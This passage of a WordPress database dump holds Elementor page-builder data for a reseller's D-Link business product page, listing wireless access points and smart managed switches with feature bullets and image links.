Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7536,3405,'_elementor_version','2.5.14'),(7537,3405,'_elementor_edit_mode','builder'),(7540,3406,'_wp_page_template','template-fullwidth.php'),(7541,3406,'_elementor_template_type','post'),(7542,3406,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" 